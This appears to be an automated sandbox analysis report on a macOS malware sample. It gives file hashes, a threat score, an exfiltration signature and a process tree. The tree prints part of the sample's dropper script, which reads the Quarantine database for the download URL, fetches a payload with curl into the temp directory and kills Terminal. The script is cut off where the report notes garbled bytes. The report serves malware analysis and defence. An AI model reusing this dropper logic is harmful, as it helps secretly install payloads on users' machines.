Analysis

  • max time kernel
    0s
  • max time network
    105s
  • platform
    macos-10.15_amd64
  • resource
    macos-20241101-en
  • resource tags

    arch:amd64, arch:i386, image:macos-20241101-en, kernel:19b77a, locale:en-us, os:macos-10.15-amd64, system
  • submitted
    17/02/2025, 18:06

General

  • Target

    Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a

  • Size

    34KB

  • MD5

    e5c50dcecc0d91a37a7fdb4d05206678

  • SHA1

    afc4e2271b2e6dc131fd9731769834d2ccacb149

  • SHA256

    0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a

  • SHA512

    d490555365ac53060416cbc3b64fb38eae0f6f16339c55fc2b2a1c332b672e0b45d911701c6c1d24b908fb39ea843da87e2df4e5ea8a81557bde0cc281504681

  • SSDEEP

    384:CMCyAH1ICtuL//Hk/eUlpEf0cotU2HguYZ5tvr+Q8qr3vFrh6rHskrNab8eri:DObtm3k/HipotXAuYZfp8uv75mab8z

Score
7/10

Malware Config

Signatures

  • Exfiltration Over Alternative Protocol 1 TTPs 1 IoCs

    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

Processes

  • /bin/sh
    sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a\""
    1⤵
      PID:493
    • /bin/bash
      sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a\""
      1⤵
        PID:493
      • /usr/bin/sudo
        sudo /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a
        1⤵
          PID:493
          • /bin/zsh
            /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a
            2⤵
              PID:494
            • /Users/run/Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a
              /Users/run/Macos-Malware-Samples-main/0e945fbc18090696c342731d1ddb5d6e886f83b91e698017964f21a27ebb3f2a
              2⤵
                PID:494
            • /bin/sh
              sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#*\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]||[ \"\${param}\" == \"sidw\" ]||[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/m [remainder of command line unrecoverable: garbled bytes in extraction]"
              1⤵
                PID:495
              • /bin/bash
                sh -c "temp_dir(){ if [ -n \"\${TMPDIR}\" ];then echo \"\${TMPDIR}\";else getconf DARWIN_USER_TEMP_DIR;fi;};where_from_url(){ /usr/bin/sqlite3 \"\${HOME}/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2\" \"SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1\" 2>/dev/null;};extract_did(){ local -r url=\"\$(where_from_url)\";local query=\"\${url#*\\?}\";local did_find=0;for param in \${query//[=&]/ };do((did_find == 1))&&echo \"\${param}\"&&break;[ \"\${param}\" == \"utm_source\" ]||[ \"\${param}\" == \"sidw\" ]||[ \"\${param}\" == \"neo\" ]&&did_find=1;done;};close_terminal(){ killall \"Terminal\";};download(){ local -r url=\"\${1}\";local -r tmp_dir=\"\${2}\";local -r path=\"\${tmp_dir}/\$(uuidgen)\";if curl -f -s -o \"\${path}\" \"\${url}\";then echo \"\${path}\";fi;};unarchive(){ local -r tgz_path=\"\${1}\";[ -z \"\${tgz_path}\" ]&&return;local -r app_dir=\$(/usr/bin/m [remainder of command line unrecoverable: garbled bytes in extraction]"
                1⤵
                  PID:495

Network

MITRE ATT&CK Enterprise v15